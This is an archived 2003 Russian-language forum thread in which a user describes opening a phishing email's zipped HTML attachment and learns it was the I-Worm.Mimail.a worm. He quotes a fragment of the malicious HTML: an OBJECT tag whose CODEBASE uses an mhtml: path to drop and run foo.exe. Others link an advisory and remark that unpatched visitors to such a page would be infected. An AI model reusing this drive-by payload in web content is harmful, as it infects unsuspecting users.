Главная страница
Top.Mail.Ru    Яндекс.Метрика
Текущий архив: 2003.09.01;
Скачать: CL | DM;

Вниз

Вирус в HTML ?   Найти похожие ветки 

 
kaif ©   (2003-08-12 14:57) [0]

Получил какую-то фигню по почте. Что-то типа письмо от администратора моего провайдера. Хотя я видел, что это лажа с вложением. Вложение zip. В зипе Message.html. Сдуру отурыл, полагая, что HTML вряд ли что-то совсем уж страшное может сделать. Тут же пошло сообщение о регистрации какого-то компонента, мелькнуло какое-то foo.exe. Одним словом, что-то явно не то. Сейчас скачиваю последний апдейт Касперского, чтобы проверить, чего я тут учудил. Блин...
Смотрю в текстовом виде: там многократно упоминается странный GUID.

message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:"+path+"\\message.html!File://foo.exe"></OBJECT>")
}
Файла foo.exe на компе я не нашел.
Кто в курсе проблемы? Помогите советом.


 
Anatoly Podgoretsky ©   (2003-08-12 15:03) [1]

Один из последних вирусов
http://vil.nai.com/vil/content/v_100523.htm


 
pasha_golub ©   (2003-08-12 15:05) [2]

Мне такой же пришел, типа от admin@farata.kr.ua: "Your address Pavel.Golub@farata.kr.ua will be inspired bla bla bla..."

Я думаю, вот сволочи :-) Я ж сам себе админ, вот скоты!


 
Anatoly Podgoretsky ©   (2003-08-12 15:09) [3]

kaif © (12.08.03 14:57)
Сам html безопасен, почти, опасны расширения в види скриптов и ActiveX-


 
kaif ©   (2003-08-12 15:13) [4]

Касперский уже видит:

D:\WINNT\Wideodrv.exe I-Worm.Mimail.a
D:\WINNT\exe.tmp

Блин...
А откуда он ActiveX взял? Скачал на лету из сети что ли?


 
kaif ©   (2003-08-12 15:27) [5]

2 Anatoly Podgoretsky © (12.08.03 15:03) [1]
Спасибо большое за ссылку!


 
kaif ©   (2003-08-12 15:40) [6]

Всё. Удалил руками. Слава богу, что просто червь... Это мне наказание за беспечность. :(


 
ZeroDivide ©   (2003-08-12 15:56) [7]

капец. Это значит на страничку можно такую же фигню поставить и все, кто на нее зайдет и у кого эти сраные майкросовые патчи не стоят - поимеют вирус.

automatically create the file foo.exe in the Temporary Internet Files folder and run it.

нда.. уж..



Страницы: 1 вся ветка

Текущий архив: 2003.09.01;
Скачать: CL | DM;

Наверх




Память: 0.48 MB
Время: 0.015 c
1-1390
imp403
2003-08-16 12:57
2003.09.01
64x Icon


3-1278
andrey__
2003-08-11 11:59
2003.09.01
Уьеньшить объём log - файла


3-1315
kostik78ua
2003-08-08 16:08
2003.09.01
Обрезание поля


3-1339
Hooch
2003-08-07 11:01
2003.09.01
редактируемый датасет в ADO


3-1320
Alex_74
2003-08-06 14:16
2003.09.01
Установка фильтра по полю даты в ApolloTable